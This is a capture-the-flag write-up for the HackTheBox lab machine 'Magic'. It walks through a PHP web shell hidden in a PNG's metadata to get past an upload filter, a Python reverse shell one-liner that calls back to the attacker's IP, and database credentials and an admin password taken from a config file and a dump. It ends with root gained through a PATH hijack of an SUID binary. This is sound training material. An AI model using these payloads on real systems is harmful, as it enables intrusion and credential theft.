HackTheBox — Magic
Summary
Magic is a medium machine rate with IP 10.10.10.185
Enumeration
Nmap
Web Browsing
Port 80
I found login page, So i think to use sql injection
It’s redirected me to upload.php page
I tried to upload php file, But i got error
I decided to inject the payload in png photo using exfitool
root@strike:~# exiftool -Comment='<?php system($_GET["cmd"]); ?>' test.php.png
1 image files updated
root@strike:~#
After upload i went to directory and tried to executed commands
And It’s work, After that i tried to get the reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",4142));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Got it
root@strike:~# nc -lvp 4142
listening on [any] 4142 ...
10.10.10.185: inverse host lookup failed: Unknown host
connect to [10.10.14.55] from (UNKNOWN) [10.10.10.185] 47278
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/var/www/Magic/images/uploads$
Let’s enumerate using this user
ww-data@ubuntu:/var/www/Magic$ls
ls
1 db.php5 index.php logout.php upload.php
assets images login.php magic.sql
Let’s take a look on db.php5
www-data@ubuntu:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
private static $cont = null;
public function __construct() {
die('Init function is not allowed');
}
public static function connect()
{
// One connection through whole application
if ( null == self::$cont )
{
try
{
self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
}
catch(PDOException $e)
{
die($e->getMessage());
}
}
return self::$cont;
}
public static function disconnect()
{
self::$cont = null;
}
}
Now we have new credentials to access, But i can’t switch to this user
I decided to dump all database
www-data@ubuntu:/tmp$ mysqldump Magic -u theseus -p
mysqldump Magic -u theseus -p
Enter password: iamkingtheseus
-- MySQL dump 10.13 Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost Database: Magic
-- ------------------------------------------------------
-- Server version 5.7.29-0ubuntu0.18.04.1
...
--
-- Dumping data for table `login`
--
LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
...
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2020-08-18 10:22:14
I got password from database, Let’s switch to this user
www-data@ubuntu:/var/www/Magic$ su - theseus
su - theseus
Password: Th3s3usW4sK1ng
theseus@ubuntu:~$
Gain user flag!
Privilege Escalation
SUID Binaries
theseus@ubuntu:~$ find / -perm -u=s 2>/dev/null
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
.....
.....
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
Take a look on /bin/sysinfo
theseus@ubuntu:~$ strings /bin/sysinfo
/lib64/ld-linux-x86-64.so.2
libstdc++.so.6
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
.....
.....
popen() failed!
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
====================MEM Usage=====================
free -h
Path Injection
I created an executable named lshw in /tmp and added /tmp to the PATH environment variable
theseus@ubuntu:/tmp$ cat lshw
/bin/bash 1>&0 2>&0
theseus@ubuntu:/tmp$ chmod +x lshw
theseus@ubuntu:/tmp$ ls -al lshw
-rwxrwxr-x 1 theseus theseus 20 Aug 18 16:32 lshw
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
theseus@ubuntu:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
Run /bin/sysinfo
theseus@ubuntu:/tmp$ /bin/sysinfo
====================Hardware Info====================
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls
info.c root.txt
root@ubuntu:/root#
Gain root flag!
If u learn any thing useful from write up, Respect me on HackTheBox
THX for ur time!